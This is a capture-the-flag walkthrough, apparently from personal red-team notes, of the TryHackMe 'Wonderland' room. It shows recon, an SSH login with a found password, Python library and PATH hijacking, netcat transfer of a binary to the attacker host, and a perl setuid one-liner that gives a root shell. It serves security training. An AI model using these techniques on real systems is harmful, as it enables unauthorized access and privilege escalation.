> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/wonderland.md).

# Wonderland

**Room Link:** <https://tryhackme.com/room/wonderland>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="/files/clYl57bP0AWwOLSHGazl" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="/files/bjGz8PSRQxTDSx4dXUEp" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/mo9VyGztXN3mMRv1L4Fl" alt=""><figcaption></figcaption></figure>

I can see I'm on the right track on the browser

<figure><img src="/files/sIZ5HC7b8xjIJNyOWnya" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/r/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="/files/jCqHLU0SATknhBSfs9bt" alt=""><figcaption></figcaption></figure>

**Kali**

```
gobuster dir -u http://$VICTIM/r/a -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

After a few letters I was able to just guess the word it's spelling out

<figure><img src="/files/L3z2Uf2FQzdgQyUsQdXx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/8UD55wMV5rySGW3uIEgB" alt=""><figcaption></figcaption></figure>

## TCP/22 - SSH

**Kali**

```
ssh alice@$VICTIM
Pass: HowDothTheLittleCrocodileImproveHisShiningTail
```

<figure><img src="/files/ed42yXuq19moLRyt2wxV" alt=""><figcaption></figcaption></figure>

## Lateral Movement - Abusing Library path

**Victim**

```
sudo -l
cat /home/alice/walrus_and_the_carpenter.py
```

<figure><img src="/files/PdPop2Qhp7E8CoHlouRX" alt=""><figcaption></figcaption></figure>

Using the first command we can see the path it follows, we can see the first thing it will try is the current directory so we can make a random.py script of our own and put anything we want in it.

**Victim**

```
python3 -c 'import sys; print (sys.path)'
locate random.py
```

<figure><img src="/files/2qHG87kRl5NiuD95LcT6" alt=""><figcaption></figcaption></figure>

**Victim**

```
echo 'import os' > random.py
echo 'os.system("/bin/bash")' >> random.py
cat random.py
```

<figure><img src="/files/uhPo6lCGXcMfaoypsgkf" alt=""><figcaption></figcaption></figure>

**Victim**

```
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```

<figure><img src="/files/Ih15HwnUaMRCAJTw3AUS" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/hP3VImaaqw4RHWZ0YBW7" alt=""><figcaption></figcaption></figure>

## Lateral Movement - Abusing Paths

**Kali(receiving)**

```
nc -l -p 1234 > teaParty
```

**Victim(sending)**

```
nc -w 3 $KALI 1234 < teaParty
```

### Ghidra

I opened the file in Ghidra and can see that the program is running the date command which we see outputted when we run the script. But note that the date command isn't using the full path so if we add somewhere else in our path we can run our own date command instead.

<figure><img src="/files/VlyVAMIcTYAXtGxhIu6K" alt=""><figcaption></figcaption></figure>

I added tmp to my path

**Victim(rabbit)**

```
echo $PATH
export PATH=/tmp:$PATH
echo $PATH
```

<figure><img src="/files/8sVFxGMNvs927v1d1mER" alt=""><figcaption></figcaption></figure>

I'm not the hatter

**Victim(rabbit)**

```
cd /tmp
echo '#!/bin/bash' > date
echo '/bin/bash' >> date
chmod +x date
cat date
/home/rabbit/teaParty 
```

<figure><img src="/files/1bCmF8lJpJQVP1UmRQAl" alt=""><figcaption></figcaption></figure>

## Privilege Escalation&#x20;

**Victim(hatter)**

We can just follow what's under capabilities but only the last command as CAP\_SETID is already set for perl.

**Exploit:** <https://gtfobins.github.io/gtfobins/perl/>

```
getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

<figure><img src="/files/d0BN9v2rQlrKC36EN7LU" alt=""><figcaption></figcaption></figure>
